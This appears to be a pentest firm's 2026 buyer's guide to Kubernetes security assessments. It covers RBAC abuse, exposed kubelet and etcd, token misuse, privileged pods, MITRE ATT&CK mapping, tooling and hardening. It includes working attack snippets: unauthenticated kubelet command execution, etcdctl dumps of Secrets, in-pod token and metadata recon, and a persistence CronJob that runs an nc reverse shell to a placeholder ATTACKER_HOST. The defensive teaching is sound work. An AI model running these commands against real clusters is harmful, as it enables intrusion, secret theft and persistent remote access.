Kubernetes Pentest in 2026: What a Real Container Security Assessment Covers
A Kubernetes pentest is not a network pentest with YAML on top. It is a different engagement — different scope, different assumptions, different attacker model — and by 2026 that difference matters more than ever.
The CNCF’s 2026 cloud-native survey reports that 82% of container users now run Kubernetes in production, up from 66% in 2023. Red Hat’s 2024 State of Kubernetes Security found that 89% of organisations had at least one container or Kubernetes security incident in the preceding twelve months, and 46% of them lost revenue or customers as a result. Wiz’s 2025 Kubernetes Security Report puts the speed of opportunistic attacks in stark terms: a newly provisioned AKS cluster sees its first attack attempt within 18 minutes; EKS within 28.
If that is the baseline, then “we scanned our images and ran kube-bench” is not a security program. This post is a buyer’s guide for CISOs and security leads: what a credible Kubernetes pentest actually covers, which attack paths you should expect to see in the report, and what separates a real assessment from a checkbox exercise.
Why Kubernetes breaks the traditional pentest mental model
A standard external network pentest asks one question: can I break in from the outside? A standard web application pentest asks: can I bypass the app’s authentication, authorisation, or business logic?
A Kubernetes pentest asks both of those and a third one that changes the entire scope:
If one pod is already lost, how far can the attacker go?
That “assume breach” framing is not optional. Kubernetes combines five risk surfaces that most other environments keep separate — shared-kernel container isolation, a single highly privileged API-driven control plane, fine-grained RBAC, flat east-west networking, and declarative infrastructure stored as code. Compromise at any one of those layers can cascade into the others. And the assets are ephemeral: pods come and go, which means evidence of an intrusion may be gone before you notice it.
So a Kubernetes pentest has to do three things a conventional engagement does not:
- Start from inside the cluster as well as outside. A pentester should be handed a low-privilege pod and asked to show what they can reach.
- Review manifests, Helm charts, and admission policies as artifacts in their own right. Your security posture is defined in YAML. That YAML is in scope.
- Map findings to an attacker’s goals, not to a scanner’s categories. The MITRE ATT&CK for Containers matrix is the right reference frame, not a generic CVSS list.
The 2026 Kubernetes threat landscape, in five numbers
Stats worth carrying into the next board meeting:
- 82% in production. Kubernetes is no longer emerging infrastructure. It is a standard target. (CNCF, January 2026)
- 89% incident rate. Nearly nine in ten organisations reported a Kubernetes-related security incident in the prior year, and 45% specifically reported runtime incidents. (Red Hat, June 2024)
- 18 minutes to first attack. That is how long new cloud clusters typically sit unbothered before the internet finds them. (Wiz, 2025)
- 40,000× the humans. Sysdig’s 2025 report found that service accounts outnumber human users by roughly four orders of magnitude and are 7.5× riskier in practice. Identity is the new perimeter, and most of that identity is non-human. (Sysdig, March 2025)
- ~5.5% critical-severity runtime plateau. The share of running images carrying critical or high vulnerabilities has roughly levelled off, while runtime automation continues to grow: 70%+ of teams now use behaviour-based detections. (Sysdig, April 2026)
The pattern is familiar: hygiene is improving, attacker tempo is not forgiving, and the weak spots have shifted from “unpatched CVEs” toward identity, configuration, and supply chain.
How a pod becomes a cluster: the attack paths that keep showing up
Every competent Kubernetes pentest eventually tells the same story, with minor variations. You start with a small foothold — a vulnerable application, a leaked token, an exposed endpoint — and you end with administrative control over the cluster, the workloads, and usually the underlying cloud account too. Here are the rungs of that ladder.
1. Overly permissive RBAC
This is the single most common finding. Teams ship a workload with cluster-admin, a wildcard verb, or access to serviceaccounts/token, and quietly forget about it. Kubernetes’ own RBAC good practices explicitly call out the permissions that matter: the bind, escalate, and impersonate verbs, plus access to the nodes/proxy subresource. Each of these can be turned into a privilege escalation primitive. Node proxy access is particularly under-appreciated: it effectively grants access to the kubelet API and can bypass both admission control and audit logging.
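To make the pattern concrete, here is a hypothetical Role of the kind a pentester flags on sight. All names are illustrative; the point is that neither rule says "admin", yet together they let the holder grant themselves any permission in the namespace and mint tokens for any service account in it:

```yaml
# Illustrative anti-pattern, not a real workload's RBAC.
# "escalate" lets the holder grant permissions they do not themselves
# hold; "create" on serviceaccounts/token mints fresh tokens for any
# service account in the namespace.
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: ci-deployer        # benign-looking, attacker-useful
  namespace: prod
rules:
  - apiGroups: ["rbac.authorization.k8s.io"]
    resources: ["roles", "rolebindings"]
    verbs: ["create", "update", "escalate"]
  - apiGroups: [""]
    resources: ["serviceaccounts/token"]
    verbs: ["create"]
```

A manifest like this usually arrives as a convenience for a CI pipeline and is never revisited.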
2. Exposed kubelet on port 10250
If a pentester can reach the kubelet API with anonymous authentication still enabled, the game is often already over. They can enumerate pods, exec into them, and pivot across the node. The Kubernetes kubelet authn/authz docs and the OWASP Kubernetes Top 10 both flag anonymous kubelet access as a critical misconfiguration; we still find it, especially on older on-premises clusters.
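A quick sketch of how testers probe for this, against a placeholder node IP. If the first request returns the pod list without any credentials, anonymous auth is on and command execution via the kubelet's run endpoint is usually possible too:

```shell
# Probe a node's kubelet for anonymous access (10.0.0.5 is a placeholder).
curl -sk https://10.0.0.5:10250/pods | head

# If the pod list came back unauthenticated, exec is typically next:
# POST /run/<namespace>/<pod>/<container> with a cmd parameter.
curl -sk -X POST \
  "https://10.0.0.5:10250/run/default/web-1/app" \
  -d "cmd=id"
```

Run this against every node, not just one; on-premises clusters in particular often have inconsistent kubelet flags across node pools.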
3. Exposed or unauthenticated etcd
Etcd on port 2379 without mutual TLS is the nuclear option. Etcd holds the entire cluster state; reading it bypasses Kubernetes RBAC entirely. And by default, Secrets are stored in etcd as plaintext unless encryption-at-rest has been explicitly configured. A successful etcd dump usually ends the engagement immediately.
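What that dump looks like in practice, sketched with etcdctl v3 against a placeholder endpoint (in a real engagement the host, and possibly stolen client certificates, come from earlier recon):

```shell
# Assumes etcd v3 API and a reachable endpoint; ETCD_HOST is a placeholder.
export ETCDCTL_API=3

# Kubernetes stores Secrets under /registry/secrets/<namespace>/<name>.
etcdctl --endpoints=https://ETCD_HOST:2379 \
  get /registry/secrets --prefix --keys-only | head

# Without encryption at rest, reading any one key yields the plaintext
# Secret object, bypassing RBAC entirely.
etcdctl --endpoints=https://ETCD_HOST:2379 \
  get /registry/secrets/kube-system/SOME_SECRET
```

If this works anonymously, the finding is critical regardless of anything else in the report.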
4. Service account token abuse
By default, Kubernetes mounts a projected service account token into every pod. If the application has no reason to talk to the API server, that token is pure attacker fuel. The service account documentation and the application security checklist both recommend setting automountServiceAccountToken: false wherever possible. It almost never is.
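The fix is one field, settable on the ServiceAccount, the Pod spec, or both. A minimal sketch with illustrative names:

```yaml
# Opt a workload out of the API token it never uses.
apiVersion: v1
kind: ServiceAccount
metadata:
  name: web-frontend
  namespace: prod
automountServiceAccountToken: false
---
apiVersion: v1
kind: Pod
metadata:
  name: web-frontend
  namespace: prod
spec:
  serviceAccountName: web-frontend
  automountServiceAccountToken: false   # belt and braces at pod level
  containers:
    - name: app
      image: registry.example.com/web-frontend:1.4.2
```

The pod-level setting wins when both are specified, so setting it in the workload template is the safer default for templated deployments.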
5. Privileged pods, hostPath, hostPID, hostNetwork
These settings collapse the isolation boundary between container and host. A privileged pod with a hostPath mount of / is, for practical purposes, the node. The Pod Security Standards disallow all of these even in the baseline profile; the restricted profile goes further still. In pentests, we frequently find “temporary” DaemonSets with host-level access that have been running for years.
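This is the shape of the anti-pattern as it appears in the wild, sketched with illustrative names. Anyone who can exec into one of these pods can chroot into the node's filesystem and harvest kubelet credentials:

```yaml
# Hypothetical "debug" DaemonSet: in practice, root on every node.
apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: node-debug
spec:
  selector:
    matchLabels: {app: node-debug}
  template:
    metadata:
      labels: {app: node-debug}
    spec:
      hostPID: true          # see every process on the node
      hostNetwork: true      # share the node's network namespace
      containers:
        - name: shell
          image: busybox
          command: ["sleep", "infinity"]
          securityContext:
            privileged: true # disables most isolation mechanisms
          volumeMounts:
            - name: host-root
              mountPath: /host
      volumes:
        - name: host-root
          hostPath:
            path: /          # the entire node filesystem
```

Every field here is individually greppable, which is why manifest review belongs in scope.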
6. Container escape via runtime bugs
Most of the time, pentesters do not need a container escape — one is usually handed to them by the configuration. But when runtime bugs do land, they are severe. CVE-2024-21626, “Leaky Vessels,” in runc allowed host filesystem access via leaked file descriptors and working-directory tricks. CVE-2024-10220 turned the legacy gitRepo volume into arbitrary command execution on the node for any user who could create pods. Both reinforce that runtime patching belongs in your pentest scope conversation, not just your ops team’s backlog.
7. The 2025 ingress-nginx disclosure (“IngressNightmare”)
If you only remember one Kubernetes CVE from the last two years, make it this one. CVE-2025-1974, disclosed by the Kubernetes Security Response Committee on 24 March 2025, allowed unauthenticated remote code execution in the widely deployed ingress-nginx controller. Because ingress-nginx is typically granted broad Secret access, exploitation often leads to cluster-wide Secret disclosure and, in the SRC’s own words, gives anyone on the pod network a “good chance” of taking over the cluster with no credentials at all. Wiz estimated that a substantial fraction of internet-reachable clusters were exposed at disclosure time. If your pentest report does not mention how your environment fared against IngressNightmare, ask why.
8. Supply chain: unsigned images, opaque dependencies
The OWASP Kubernetes Top 10 supply-chain entry is the short version of a long conversation. Unsigned base images, untrusted registries, hidden layers, and CI/CD pipelines with write access to production clusters all turn one compromised developer workstation into cluster-wide risk. A real pentest inspects this part of the stack, not just the running pods.
The methodology: mapping a Kubernetes pentest to MITRE ATT&CK for Containers
The cleanest way to structure a Kubernetes engagement — and the cleanest report format — is to follow the ATT&CK for Containers matrix. Microsoft’s updated threat matrix for Kubernetes is a useful companion view.
Reconnaissance and discovery. External recon covers the API server, ingress, exposed dashboards, kubelets, and registries. Internal recon — which only happens in an assume-breach test — enumerates the compromised pod’s service-account permissions, mounted secrets, reachable internal services, cloud metadata endpoints, and neighbouring workloads.
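The first minutes of internal recon follow a well-worn script. A hedged sketch of it, using the standard projected-token mount paths (the metadata URL shown is AWS's; other clouds differ):

```shell
# What identity does this pod hold, and what can it see?
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
NS=$(cat /var/run/secrets/kubernetes.io/serviceaccount/namespace)

# Ask the API server what this service account may do in its namespace.
curl -sk -X POST \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  "https://kubernetes.default.svc/apis/authorization.k8s.io/v1/selfsubjectrulesreviews" \
  -d "{\"apiVersion\":\"authorization.k8s.io/v1\",\"kind\":\"SelfSubjectRulesReview\",\"spec\":{\"namespace\":\"$NS\"}}"

# Is the cloud metadata endpoint reachable from the pod network?
curl -s --max-time 2 http://169.254.169.254/latest/meta-data/iam/ || true
```

A non-empty answer to either question typically sets the direction for the rest of the engagement.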
Initial access. Public-facing application exploitation, weak or missing ingress authentication, a compromised image pulled from CI/CD, or stolen cloud credentials that grant kubeconfig access. The exposed Kubernetes Dashboard is still a live issue in internal-facing clusters more often than vendors would like to admit.
Privilege escalation. This is the most differentiated part of a Kubernetes pentest, and where commodity scanners are weakest. The pentester looks for paths from a low-privilege service account to cluster-admin, chaining RBAC verbs, node proxy access, workload creation with more-privileged service accounts, privileged container escape to the node, and token harvesting from the node’s filesystem.
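With kubectl available and a stolen token in hand (assume `$TOKEN` and `$SERVER` were obtained during recon; both are placeholders here), the escalation checks reduce to a handful of `auth can-i` probes:

```shell
# Full permission dump for the current identity.
kubectl --server="$SERVER" --token="$TOKEN" auth can-i --list

# The classic escalation primitives, one by one.
kubectl --server="$SERVER" --token="$TOKEN" auth can-i create pods                   # schedule a more-privileged workload?
kubectl --server="$SERVER" --token="$TOKEN" auth can-i create serviceaccounts/token  # mint tokens for other identities?
kubectl --server="$SERVER" --token="$TOKEN" auth can-i escalate roles                # raise our own role's permissions?
kubectl --server="$SERVER" --token="$TOKEN" auth can-i impersonate users             # act as another user?
kubectl --server="$SERVER" --token="$TOKEN" auth can-i get nodes/proxy               # reach kubelets via the API server?
```

Any single "yes" among the last five is usually a rung on the ladder; two or more and cluster-admin is a matter of hours.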
Lateral movement. Kubernetes networking is flat by default — every pod can talk to every other pod unless a NetworkPolicy says otherwise. The test maps pod-to-pod reachability, namespace crossings, access to internal management planes, service meshes, and crossover into the cloud provider’s IAM via workload identity.
Persistence. Kubernetes persistence is declarative. Instead of dropping a binary, an attacker creates a CronJob, a DaemonSet, a mutating webhook, a sidecar, or simply edits a GitOps manifest upstream. For defenders, this is why “just kill the pod” is rarely the right incident response step.
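A minimal sketch of the pattern, with an attacker-chosen benign-looking name and a placeholder callback address. Deleting any one pod achieves nothing: the CronJob controller recreates the workload on schedule until the object itself, and whatever GitOps source defines it, is removed:

```yaml
# Hypothetical declarative persistence, as a defender would find it.
apiVersion: batch/v1
kind: CronJob
metadata:
  name: metrics-sync          # deliberately unremarkable name
  namespace: kube-system
spec:
  schedule: "*/10 * * * *"    # re-establish access every 10 minutes
  jobTemplate:
    spec:
      template:
        spec:
          restartPolicy: Never
          containers:
            - name: sync
              image: busybox
              # Placeholder reverse shell; real tradecraft varies.
              command: ["sh", "-c", "nc ATTACKER_HOST 4444 -e /bin/sh || true"]
```

This is also why audit logs on object creation, not just pod-level runtime telemetry, matter for incident response.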
Defense evasion, credential access, exfiltration. Audit visibility gaps on kubelet and node proxy paths, service account and cloud credential theft, Secret enumeration, and data egress via internal services or object storage.
The tools a credible pentest uses
Tooling alone does not make a pentest. But a credible report will reference most of the following, in context:
- kube-hunter for initial discovery of exposed Kubernetes components, from outside or from a near-cluster vantage point.
- kube-bench to measure the cluster against the CIS Kubernetes Benchmark. A good baseline, not a substitute for testing.
- kubescape for manifest, cluster, and policy misconfiguration review.
- Peirates as a post-exploitation toolkit once a pod foothold exists — enumerating service account privileges, hunting cloud metadata, and abusing what it finds.
- Trivy for image, filesystem, SBOM, and IaC scanning to cover the supply-chain side of scope.
- KubiScan for fast RBAC privilege-escalation enumeration.
- Prowler and Checkov on the posture side, and Falco as a reference point for what runtime detection should look like.
The deliverable you care about is not the tool output. It is the chain: which finding, combined with which misconfiguration, gets the attacker from point A to cluster-admin — and the evidence to reproduce it.
What good hardening looks like
If your pentest uncovers most of the attack paths above, the remediation plan should look similar across organisations. The authoritative references are NIST SP 800-190, the NSA/CISA Kubernetes Hardening Guidance v1.2, and the CIS Kubernetes Benchmark.
Practically, that means:
- Enforce admission control. Pod Security Admission for the baseline, Kyverno or OPA Gatekeeper for anything more expressive. OWASP’s 2025 Top 10 explicitly flags lack of cluster-level policy enforcement as a top risk.
- Default-deny NetworkPolicies in every namespace, with Cilium or Calico doing the heavy lifting. Flat networks are the friend of the attacker.
- Sign images, track SBOMs. Sigstore/cosign has moved from “nice to have” to table stakes; Kubernetes itself now ships signed release artifacts.
- Encrypt etcd at rest, reduce secret sprawl. Use external secret backends where you can, and avoid plain environment variables as a Secret delivery mechanism.
- Shrink the identity blast radius. Disable token automount where unused, use short-lived bound tokens, strip wildcard privileges from RBAC, and keep powerful service accounts off internet-exposed workloads.
- Invest in runtime detection. Scanning catches pre-deployment problems. Falco, Tetragon, and their peers catch the things that only show up after an attacker is already inside.
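Two of the highest-leverage controls from the list above fit in a dozen lines of YAML each. A sketch, with an illustrative namespace name; real policy sets are larger, but this is the starting point:

```yaml
# 1) Enforce the restricted Pod Security Standard on a namespace.
apiVersion: v1
kind: Namespace
metadata:
  name: prod
  labels:
    pod-security.kubernetes.io/enforce: restricted
    pod-security.kubernetes.io/audit: restricted
    pod-security.kubernetes.io/warn: restricted
---
# 2) Default-deny all traffic in that namespace; allow specific
# flows with further, narrower NetworkPolicies.
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: default-deny-all
  namespace: prod
spec:
  podSelector: {}          # selects every pod in the namespace
  policyTypes: ["Ingress", "Egress"]
```

Rolling these out in audit/warn mode first, then enforcing, is the usual low-friction migration path.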
How a Kubernetes pentest differs from a web or network pentest
A few specific differences worth communicating to a procurement team:
- Assume-breach is the default. Expect the statement of work to include a starting low-privilege pod, not only an external IP range.
- Manifests are in scope. Helm charts, Kustomize overlays, and admission policies are the security architecture. A pentest that ignores them is incomplete.
- East-west matters more than north-south. The interesting findings are usually lateral, not perimeter.
- Cloud boundary crosses are expected. Kubernetes IAM, AWS/Azure/GCP IAM, and service account token binding are all in play. A good engagement follows the attacker wherever the privileges lead.
- Time-boxed, but context-heavy. The tester needs enough time to understand your specific platform before exploiting it. A one-week “Kubernetes pentest” on a complex production cluster is almost always too short.
Frequently asked questions
What is a Kubernetes pentest? A targeted security assessment of a Kubernetes cluster that combines external and assume-breach testing, RBAC and manifest review, and attack-path analysis from a compromised pod to cluster or cloud takeover — mapped to MITRE ATT&CK for Containers and reported with reproducible evidence.
How often should we run one? Annually at minimum for any production cluster, and after any major architectural change — new service mesh, migration between cloud providers, introduction of GitOps or admission policy, or adoption of a new ingress controller. Post-IngressNightmare, many regulated clients have moved to twice-yearly.
Can a compromised pod really take over the whole cluster? Yes, and the path is usually short. In real engagements we routinely go from a single compromised pod to cluster-admin in hours, through RBAC abuse, service account token misuse, or a privileged-pod escape followed by node credential harvesting.
How is a Kubernetes pentest different from a cloud pentest? A cloud pentest focuses on the cloud provider’s IAM, services, and configurations; a Kubernetes pentest focuses on the cluster, its control plane, its workloads, and its RBAC. The two overlap at workload identity — and the best engagements cover both sides of that boundary, rather than stopping at the kubeconfig.
Where to go next
If you are evaluating a Kubernetes security assessment right now, the most useful questions to ask a prospective provider are:
- Will you start from outside only, or from inside the cluster as well?
- Are manifests, Helm charts, and admission policies in the scope of the review?
- How do you structure findings — CVSS scores or attack-path narratives mapped to MITRE ATT&CK for Containers?
- What does retesting look like, and is it included?
- Who on your team has run Kubernetes pentests before, and against clusters of what size and complexity?
At BSG, our penetration testing practice includes dedicated Kubernetes and cloud-native engagements, and we regularly combine them with application security assessments of the workloads running inside the cluster. If you want a scoping conversation — not a sales pitch — get in touch for a quote and we will tell you honestly whether a Kubernetes pentest is the right next investment for your environment, or whether you would get more value from something else first.